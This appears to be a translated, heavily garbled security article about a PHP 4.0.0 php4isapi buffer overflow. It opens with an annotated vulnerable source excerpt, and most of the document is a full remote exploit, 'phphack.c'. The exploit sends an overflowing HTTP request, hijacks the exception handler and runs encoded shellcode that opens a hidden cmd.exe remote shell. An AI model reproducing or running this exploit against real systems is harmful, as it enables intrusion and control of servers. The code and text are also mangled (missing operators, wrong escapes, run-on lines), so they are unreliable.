When PHP 4.0.0 came out, we found that php4isapi.dll had a buffer-overflow vulnerability; the relevant source code from php4isapi.c follows:
/*
 * Copies the ISAPI server variables (the isapi_server_variables table,
 * PHP_SELF, and every header listed in ALL_HTTP) into track_vars_array.
 *
 * variable_len is an in/out length: on entry it holds the size of the buffer
 * handed to GetServerVariable, and after an ERROR_INSUFFICIENT_BUFFER failure
 * it is reused below as the size to emalloc() for the retry.  Any call that
 * passes the fixed-size stack buffer static_variable_buf must therefore reset
 * variable_len to isapi_server_var_buf_size first.  The loop and the ALL_HTTP
 * lookup do so; the PHP_SELF lookup does not, which is the PHP 4.0.0 stack
 * overflow noted inline (the 4.0.3 fix is to add that reset).
 *
 * NOTE(review): this listing is transcription-mangled (case changes, missing
 * "+"/"++" operators and a "}", "/ r / n" standing for "\r\n", "setok_buf" for
 * "strtok_buf"); read it as the structure of the original php4isapi.c, not as
 * compilable code.
 */
Static void SAPI_ISAPI_REGISTER_SERVER_VARIABLES (ZVAL * TRACK_VARS_ARRAY ELS_DC SLS_DC PLS_DC)
{
Char static_variable_buf [isapi_server_var_buf_size]; /* fixed-size stack buffer; the overflow target */
CHAR * VARIABLE_BUF; /* points at static_variable_buf or at an emalloc'd copy */
DWORD VARIABLE_LEN = isapi_server_var_buf_size; /* in/out length for GetServerVariable */
CHAR * VARIABLE;
Char * strtok_buf = NULL;
LPEXTENSION_CONTROL_BLOCK LPECB;
Char ** p = isapi_server_variables; /* NULL-terminated list of variable names */
LPECB = (LPEXTENSION_CONTROL_BLOCK) SG (Server_Context);
/* Register the standard ISAPI variables */
While (* p) {
/* Reset the bound every iteration: the previous call may have grown it */
VARIABLE_LEN = isapi_server_var_buf_size;
IF (lpecb-> getServerVariable (lpecb-> connid, * p, static_variable_buf, & variable_len)
&& stat_variable_buf [0]) {
PHP_REGISTER_VARIABLE (* p, static_variable_buf, track_vars_array els_cc pls_cc);
/* Too big for the stack buffer: variable_len now holds the required size */
Else IF (getLastError () == Error_INSUFFICIENT_BUFFER) {
Variable_buf = (char *) Emalloc (variable_len);
IF (LPECB-> GetSerVariable (lpecb-> connid, * p, variable_buf, & variable_len)
&& variable_buf [0]) {
PHP_REGISTER_VARIABLE (* p, variable_buf, track_vars_array els_cc pls_cc);
}
Efree (variable_buf);
}
P ;
}
/* PHP_SELF support */
/*
 * Defect: variable_len is NOT reset here.  If the last loop iteration took
 * the emalloc path, variable_len is larger than isapi_server_var_buf_size,
 * so GetServerVariable is told the stack buffer is bigger than it is and a
 * long request path overruns static_variable_buf.  Mitigation (4.0.3):
 * assign isapi_server_var_buf_size to variable_len before this call, exactly
 * as the loop above and the ALL_HTTP lookup below do.
 */
#ifdef with_zeus
IF (LPECB-> GetSerVariable (LPECB-> ConnID, "Path_INFO", Static_Variable_buf, & variable_len
#ELSE
IF (LPECB-> GetSerVariable (LPECB-> ConnID, "Script_name", Static_Variable_buf, & variable_len)
/* PHP 4.0.0 vulnerability is here: a stack buffer overflow.  At this point
 * variable_len still holds the value returned by the last GetServerVariable
 * call in the loop above. */
/* Fixed in PHP 4.0.3 */
#ENDIF
&& stat_variable_buf [0]) {
PHP_REGISTER_VARIABLE ("PHP_SELF", Static_Variable_buf, TRACK_VARS_ARRAY ELS_CC PLS_CC);
/*
 * Author's note: because of how the frame is overwritten this call does not
 * return normally, so a classic return-address overwrite is ineffective; the
 * author's exploit targets the exception-handling structure instead (see
 * their related articles).
 */
}
/* Register the individual headers contained in ALL_HTTP */
/* Here the bound IS reset before reusing the stack buffer */
VARIABLE_LEN = isapi_server_var_buf_size;
IF (LPECB-> GetServerVariable (LPECB-> ConnID, "All_HTTP", Static_Variable_buf, & variable_len) {
Variable_buf = static_variable_buf;
} else {
IF (getLastError () == Error_INSUFFICIENT_BUFFER {
Variable_buf = (char *) Emalloc (variable_len);
IF (! lpecb-> getServerVariable (LPECB-> ConnID, "All_http", variable_buf, & variable_len) {
Efree (variable_buf);
Return;
}
} else {
Return;
}
}
/* ALL_HTTP is one line per header, "NAME: value", separated by CR/LF */
Variable = php_strtok_r (variable_buf, "/ r / n", & setok_buf);
While (variable) {
Char * colon = strchr (variable, ':');
IF (colon) {
CHAR * VALUE = COLON 1;
/* skip the blanks that follow the colon */
While (* value == '') {
Value ;
}
/* temporarily terminate the name at the colon, then restore it */
* colon = 0;
PHP_REGISTER_VARIABLE (Variable, Value, Track_vars_Array ELS_CC PLS_CC);
* colon = ':';
}
Variable = php_strtok_r (NULL, "/ R / N", & Strtok_buf);
}
/* only the emalloc'd copy is owned by us; the stack buffer is not freed */
IF (variable_buf! = static_variable_buf) {
Efree (variable_buf);
}
}
Because of this bug, the overwritten exception-handling structure lets the shellcode take control. However, because the exception-structure code is fairly uniform, the relevant parameters may need to be adjusted according to the Windows version of the attacked system. The specific attack test code:
/ *
PHP4.0 overflow program phphack.c Ver 1.0
Copy by yuan
* /
#include
#include
#include
#include
// #define debug
// # Define reteipaddr Eipwin2000
#define fnendlong 0x08
#define nopcode 'b' // inc Edx 0x90
#define noplong 0x3c
#define buffsize 0x20000
#define reteipaddress 0x900 4
#define shellbuffsize 0x800
#define shellfnnums 9 # define dataxorcode 0xAA
#define lockbignum 19999999
#define LockBignum2 13579139
#define shellport 0x1f90 // 0x1f90 = 8080
#define Webport 80
Void shellcodefnlock ();
Void shellcodefn (char * ecb);
Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkespadd, Int Len)
INT main (int Argc, char ** argv)
{
Char * server;
Char * str = "loadLibrarya" "/ x0" "createpipe" "/ x0"
"CreateProcessa" "/ x0" "closehandle" "/ x0"
"Peeknamedpipe" "/ x0"
"Readfile" "/ x0" "Writefile" "/ x0"
"Sleep" "/ x0"
"cmd.exe" "/ x0" "/ x0d / x0a" "it" "/ x0d / x0a" "/ x0"
"Xordata" "/ x0"
"strend";
CHAR BUFF1 [] = "get /default.php4";
Char buff2 [] = "http / 1.1 / nhost:";
Char * fnendstr = "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90";
CHAR SRLF [] = "/ x0d / x0a / x00 / x00";
Char Eipjmpesp [] = "/ xb7 / x0e / xfa / x7f";
// Push ESP
// Ret
Char energyxcept [] = "/ xb8 / x0e / xfa / x7f";
// Ret
Char Eipjmpesi [] = "/ x08 / x88 / xfa / x7f";
Char Eipjmpedi [] = "/ xbe / x8b / xfa / x7f";
Char Eipjmpebx [] = "/ x73 / x67 / xfa / x7f";
// push ebx
// Ret
/ *
JMP EBX function code address, Chinese Winnt, Chinese Win2000 this address fixed
This is in a c_936.nls module
When Win2000 occurs an exception call exception handling structure code, EBX points to anomalous structure. The old version of Winnt is ESI, available 7FFA8808, which is EDI, and 7FFA8BBE can be used.
* /
CHAR BUFF [Buffsize];
Char recvbuff [buffsize];
Char shellcodebuff [0x1000];
Struct SockAddr_in S_IN2, S_IN3;
Struct hostent * he;
Char * shellcodefnadd, * chkespadd;
Unsigned int sendpacketlong;
// unsigned
INT I, J, K;
UNSIGNED CHAR TEMP;
Int fd; u_short port, port1, shellcodeport;
Socket D_IP;
Wsadata wsadata;
INT OFFSET = 0;
Int xordaBegin;
INT LOCKINTVAR1, LOCKINTVAR2;
Char Lockcharvar;
INT OVERADD = Reteipaddress;
Int result;
FPRINTF (stderr, "/ n php4.0 for win32 overflow program 2.0.");
FPRINTF (stderr, "/ n copy by yuan 2000.8.16.");
FPrintf (stderr, "/ n wellcome to my homepage http://yuange.yeah.net.");
FPRINTF (stderr, "/ n welcome to http://www.nsfocus.com.");
FPRINTF (stderr, "/ n usage:% s
IF (argc <2) {
FPRINTF (stderr, "/ n please enter the web server:");
Gets (recvbuff);
For (i = 0; i IF (Recvbuff [I]! = ') Break; } Server = Recvbuff; IF (i / * FPRINTF (stderr, "/ n please enter the offset (0-3):"); Gets (buff); For (i = 0; i IF (buff [I]! = ') Break; } OFFSET = ATOI (BUFF I); * / } Result = WSASTARTUP (Makeword (1, 1), & WSADATA); IF (Result! = 0) { FPRINTF (stderr, "Your Computer Was Not Connected" "To the Internet at the time That" "this program was launched, or you" "Do Not Have A 32-bit" "Connection to the Internet."); Exit (1); } / * IF (argc> 2) { OFFSET = ATOI (Argv [2]); } Overadd = offset; IF (Offset <0 || Offset> 3) { FPRINTF (stderr, "/ n offset error! offset 0 - 3."); Gets (buff); Exit (1); } * / IF (argc <2) { // wsacleanup (); // EXIT (1); } Else Server = argv [1]; For (i = 0; i IF (Server [i]! = ') Break; } IF (i IF (Server [i] == ':') { IF (Server [i 1] == '//' || Server [i 1] == '/') { IF (Server [i 2] == '//' || Server [i 2] == '/') { Server = i; Server = 3; Break; } } } } For (i = 1; i <= strlen (server); i) { IF (Server [i-1] == '//' || Server [i-1] == '/') Server [i-1] = 0; } D_IP = inet_addr (server); IF (D_IP == - 1) { He = gethostByname (Server); IF (! HE) { WSACLEANUP (); Printf ("/ n can't get the ip of% s! / n", server); Gets (buff); Exit (1); } Else Memcpy (& D_IP, HE-> H_ADDR, 4); } IF (Argc> 2) Port = ATOI (Argv [2]); Else Port = Webport; IF (port == 0) Port = Webport; FD = Socket (AF_INET, SOCK_STREAM, 0); i = 8000; Setsockopt (FD, SOL_SOCKET, SO_RCVTIMEO, (Const Char *) & I, SizeOf (i)); S_IN3.SIN_FAMILY = AF_INET; S_IN3.SIN_PORT = HTONS (Port); S_IN3.SIN_ADDR.S_ADDR = D_IP; Printf ("/ N Nuke IP:% S Port% D", INET_NTOA (S_IN3.SIN_ADDR), HTONS (S_IN3.SIN_PORT)); IF (Connect (FD, (Struct SockAddr *) & S_IN3, SIZEOF (Struct SockAddr_in))! 
= 0) { CloseSocket (FD); WSACLEANUP (); FPRINTF (stderr, "/ n connect err."); Gets (buff); Exit (1); } _asm { MOV ESI, ESP CMP ESI, ESP } _chkesp (); Chuestspadd = _chkesp; Temp = * chuest; IF (Temp == 0xE9) { chuesthant I = * (int *) Chuestion; Chkespadd = i; Chkespadd = 4; } Shellcodefnadd = shellcodefnlock; Temp = * shellcodefnadd; IF (Temp == 0xE9) { shellcodefnadd; K = * (int *) shellcodefnadd; Shellcodefnadd = K; shellcodefnadd = 4; } For (k = 0; k <= 0x500; k) { IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break; } MEMSET (BUFF, NOPCODE, BUFFSIZE); IF (argc> 4) { Memcpy (buff, Argv [4], Strlen (Argv [4])); } Else Memcpy (Buff, Buff1, Strlen); // strcpy (buff, buff1); // MEMSET (Buff), Nopcode, 1); Memcpy (buff Overadd 0x60 Noplong, shellcodefnadd k 4,0x80); // Memcpy (buff noplong, shellcodefnadd k 4, 0x80); Shellcodefnadd = shellcodefn; Temp = * shellcodefnadd; IF (Temp == 0xE9) { shellcodefnadd; K = * (int *) shellcodefnadd; Shellcodefnadd = K; Shellcodefnadd = 4; } For (k = 0; k <= 0x1000; k) { IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break; } Memcpy (shellcodeBuff, shellcodefnadd, k); // j); Cleanchkesp (Shellcodefnadd, ShellcodeBuff, ChkespAdd, K); FOR (i = 0; i <0x400; i) { IF (Memcmp (STR I, "Strend", 6) == 0) Break; } Memcpy (ShellcodeBuff K, STR, I); SendPacketlong = K i; For (k = 0; k <= 0x200; k) { IF (MemcMP (Buff Overadd Noplong K, Fnendstr, Fnendlong) == 0) Break; // IF (Memcmp (Buff Noplong K, Fnendstr, Fnendlong) == 0) Break; } For (i = 0; i Temp = shellcodebuff [i]; Temp = DataXorcode; IF (Temp <= 0x10 || Temp == '"|| Temp ==' / '|| Temp ==' // '|| Temp ==' 0 '|| Temp = = '?' 
|| Temp == '%') { BUF [OVERADD NOPLONG K] = '0'; // buff [Noplong K] = '0'; K; TEMP = 0x40;} BUF [OVERADD NOPLONG K] = TEMP; // buff [Noplong K] = TEMP; K; } // Memcpy (Buff Overadd Noplong K, ShellcodeBuff, SendPacketLong); // k = sendpacketlong; / * FOR (i = -0x30; i <0x30; i = 4) { Memcpy (buff Overadd i, EIPEXCEPT, 4); } Memcpy (Buff Overadd i, Eipjmpesp, 4); * / For (i = -40; i <0x40; i = 8) { Memcpy (buff Overadd I, "/ X42 / X42 / X42 / X2D", 4); Memcpy (buff Overadd i 4, Eipjmpebx, 4); } Memcpy (buff Overadd i 8, "/ X42 / X42 / X42 / X42 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X5B / XFF / X63 / X64 / X42 / X42 / X42 / X42 ", 24); // fprintf (stderr, "/ n Offset:% D", OFFSET); / * 192.168.8.48 IF (argc> 2) { Server = argv [2]; IF (STRCMP (Server, "WIN9X") == 0) { Memcpy (buff Overadd, EIPWIN9X, 4); FPRINTF (stderr, "/ n nuke Win9x."); } IF (STRCMP (Server, "Winnt") == 0) { Memcpy (buff Overradd, EIPWINNT, 4); FPRINTF (stderr, "/ n nuke winnt."); } } * / Sendpacketlong = K Overadd i Noplong; // sendpacketlong = k noplong; STRCPY (Buff SendPacketlong, BUFF2); STRCPY (BUFF SendPacketlong Strlen (BUFF2), Server); Sendpacketlong = Strlen (BUFF); // buff [sendpacketlong] = 0x90; STRCPY (BUFF SendPacketlong, "/ N / N"); / * BUF [SendPacketlong] = 0x90; FOR (i = -0x30; i <0x30; i = 4) { Memcpy (buff SendPacketlong Overadd i, EIPEXCEPT, 4); } Memcpy (Buff SendPacketlong Overadd I, EIPWINNT, 4); STRCPY (Buff SendPacketlong Overadd i 4, "/ XFF / X63 / X64"); STRCPY (Buff SendPacketlong Overadd i 20, "/ N / N"); * / // Printf ("/ N Send Buff: / N% S", BUFF); // STRCPY (BUFF OVERADD NOPLONG, Shellcode); Sendpacketlong = Strlen (BUFF); / * #ifdef debug _asm { LEA ESP, BUFF Add ESP, OVERADD RET } #ENDIF * / IF (argc> 6) { IF (strCMP (Argv [6], "Debug") == 0) { _asm { LEA ESP, BUFF Add ESP, OVERADD RET } } } XORDATABEGIN = 0; FOR (i = 0; i <1; i) { J = sendpacketlong; FPRINTF (stderr, "/ n send packet% d bytes.", J); // fprintf (stderr, "/ n SNED: / N% S", 
BUFF); Send (FD, BUFF, J, 0); K = RECV (FD, Recvbuff, 0x1000, 0); IF (K> = 8 && Memcmp (Recvbuff, "XORDATA", 8) == 0) { XORDATABEGIN = 1; K = -1; FPRINTF (stderr, "/ n ok! / n"); } IF (k> 0) { RECVBUFF [K] = 0; FPRINTF (stderr, "/ n recv: / n% s", recvbuff); } } K = 1; IOCTLSocket (FD, Fionbio, & K); // fprintf (stderr, "/ n now begin: / n"); Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; / * For (i = 0; i SRLF [I] ^ = DataXorcode; } Send (FD, SRLF, STRLEN (SRLF), 0); Send (FD, SRLF, STRLEN (SRLF), 0); Send (FD, SRLF, STRLEN (SRLF), 0); * / K = 1; While (k! = 0) { IF (k <0) { Gets (buff); K = Strlen (BUFF); Memcpy (buff K, SRLF, 3); // Send (FD, SRLF, Strlen (SRLF), 0); // fprintf (stderr, "% s", buff); For (i = 0; i Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; // buff [i] ^ = DataXorcode; } Send (FD, BUFF, K 2, 0); // Send (FD, SRLF, Strlen (SRLF), 0); } K = RECV (FD, BUFF, 0X1000, 0); IF (xordATABEGIN == 0 && K> = 8 && Memcmp (buff, "xordata", 8) == 0) {xordatabegin = 1; K = -1; } IF (k> 0) { // fprintf (stderr, "rv% D Bytes", K); IF (xordATABEGIN == 1) { For (i = 0; i Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; } } BUFF [K] = 0; FPRINTF (stderr, "% s", buff); } // IF (k == 0) Break; } CloseSocket (FD); WSACLEANUP (); FPRINTF (stderr, "/ n the server close connect."); Gets (buff); Return (0); } Void shellcodefnlock () { _asm { NOP NOP NOP NOP NOP NOP NOP NOP _emit ('.') _emit ('p') _emit ('h') _emit ('p') _emit ('4') _emit ('?') JMP next GetIAdd: Pop Edi Push EDI POP ESI Push EBX // ECB Push EBX // Call Shellcodefn Ret Address XOR ECX, ECX LOOPLOCK: LODSB CMP AL, CL JZ Shell CMP Al, 0x30 JZ Clean0 Sto: xor al, DataXorcode Stosb JMP LOOPLOCK Clean0: Lodsb SUB Al, 0x40 JMP STO Next: Call getEDiadd Shell: NOP NOP NOP NOP NOP NOP NOP NOP } } 
Void shellcodefn (char * ecb) {Char Buff [shellbuffsize 2]; INT * EXCEPT [2]; FarProc SleepAdd; FarProc WritefileAdd; FarProc ReadfileAdd; FarProc PeeknamedpiPireAdd; FarProc CloseHandD; FarProc CreateProcessAdd; FarProc CreatePipeAdd; FarProc ProcloadLib; FarProc APIFNADD [1]; FarProc ProcgetAdd = 0; FARPROC WRITECLIENT = * (int *) (ECB 0x84); FarProc ReadClient = * (int *) (ECB 0x88); HCONN Connid = * (int *) (ECB 8); Char * stradd; INT IMGBASE, FNBASE, K, L Handle Lionle; // LibWSOCK32; Startupinfo SiINFO; PROCESS_INFORMATION processinformation; Handle Hreadpipe1, hwritepipe1, hreadpipe2, hwritepidipe2; INT LBYTESREAD; INT LOCKINTVAR1, LOCKINTVAR2; Char Lockcharvar; Security_attributes sa; _asm {JMP nextcall GetStradd: Pop Stradd Lea Edi, Except Mov DWORD PTR FS: [0], EDI } Except [0] = 0xfffffffff; Except [1] = stradd-0x07; IMGBase = 0x77E00000; _asm { Call getExceptretadd } For (; imgbase <0xBFFA0000, ProcgetAdd == 0;) { IMGBase = 0x10000; IF (imgbase == 0x78000000) IMGBase = 0xBff00000; IF (* (Word *) IMGBASE == 'ZM' && * (IMGBASE * (INT *) == 'EP') { Fnbase = * (int *) (IMGBASE * (INT *) 0x78) IMGBASE; K = * (int *) (fnbase 0xc) IMGBASE; IF (* (int *) k == 'NREK' && * (int *) (k 4) == '23LE') { LibHandle = IMGBASE; K = IMGBASE * (INT *) (FNBase 0x20); For (l = 0; l <* (int *) (fnbase 0x18); L, K = 4) { IF (* (INT *) (IMGBASE * (INT *) K) == PTEG '&& * (INT *) (4 IMGBase * (INT *) K) ==' acor ' { K = * (Word *) (L L IMGBASE * (INBASE 0x24)); K = * (int *) (fnbase 0x10) -1; K = * (int *) (K K K K IMGBASE * (INT *) (FNBase 0x1c)); ProcgetAdd = K IMGBASE; Break; } } } } } // Search Kernel32. DLL module address and API function getProcAddress address / (Note that this is not in the case where the search page is processed. IF (procgetadd == 0) goto die; FOR (k = 1; k Apifnadd [k] = procgetadd (libhandle, stradd); For (;; stradd) { IF (* (stradd) == 0 && * (stradd 1)! 
= 0) Break; } stradd; } Sa.nlength = 12; Sa.lpsecurityDescriptor = 0; Sa.binherithandle = true; CreatePipeadd (& Hreadpipe1, & HwritePipe1, & Sa, 0); CreatePipeadd (& Hreadpipe2, & HwritePipe2, & Sa, 0); // ZeromeMory (& SiInfo, SIZEOF (SIINFO); _asm { Lea Edi, SIINFO XOR EAX, EAX MOV ECX, 0x11 RepNZ Stosd } Siinfo.dwflags = startf_useshowwindow | Startf_usestdhandles; SiINFO.WSHOWINDOW = SW_HIDE; SiINFO.HSTDINPUT = HREADPIPE2; SiINFO.HSTDOUTPUT = hwritepidipe1; SiINFO.HSTDERROR = hwritepidipe1; K = 0; // while (k == 0) // { K = CreateProcessAdd (NULL, STRADD, NULL, NULL, 1, 0, NULL, NULL, & SIINFO, & ProcessInformation); STRADD = 8; //} Peeknamedpipeadd (Hreadpipe1, Buff, Shellbuffsize, & lbytesRead, 0, 0); K = 8; WriteClient (Connid, Stradd 9, & K, 0); Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; While (1) { Peeknamedpipeadd (Hreadpipe1, Buff, Shellbuffsize, & lbytesRead, 0, 0); IF (LbytesRead> 0) { Readfileadd (Hreadpipe1, Buff, LbytesRead, & lbytesread, 0); IF (LbytesRead> 0) { FOR (k = 0; k Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [K] ^ = LOCKCHARVAR; // DataXorcode; // buff [k] ^ = DataXorcode; } WriteClient (Connid, Buff, & lbytesRead, 0); // hse_io_sync); } } Else { Lbytesread = shellbuffsize; K = ReadClient (ConnID, BUFF, & LBYTESREAD); IF (k! 
= 1) { K = 8; WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exe WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exewritefileadd (hwritepipe2, stradd, k, & k, 0); // EXIT cmd.exe While (1) { SleepAdd (0x7ffffff); // is dead } } Else { FOR (k = 0; k Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [K] ^ = LOCKCHARVAR; // DataXorcode; // buff [k] ^ = DataXorcode; } WritefileAdd (hwritepipe2, buff, lbytesread, & lbytead, 0); // SleepAdd (1000); } } } Die: Goto Die; _asm { getExceptretadd: POP EAX Push EAX MOV EDI, DWORD PTR [stradd] MOV DWORD PTR [EDI-0X0E], EAX RET Errprogram: MOV Eax, DWORD PTR [ESP 0x0c] Add Eax, 0xB8 Mov DWORD PTR [EAX], 0x11223344 // stradd-0xe XOR Eax, EAX / / 2 Ret // 1 ExecptProgram: JMP errprogram // 2 bytes stradd-7 NextCall: Call getstradd //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkesp, Int Len) { INT I, K; UNSIGNED CHAR TEMP; Char * Calladd; For (i = 0; i Temp = shellbuff [i]; IF (temp == 0xe8) { K = * (int *) (shellbuff i 1); Calladd = fnadd; Calladd = k; Calladd = i; Calladd = 5; IF (calladd == chkesp) { Shellbuff [I] = 0x90; ShellBuff [i 1] = 0x43; // incn Shellbuff [i 2] = 0x4b; // DEC EBX Shellbuff [i 3] = 0x43; Shellbuff [i 4] = 0x4b; } } } }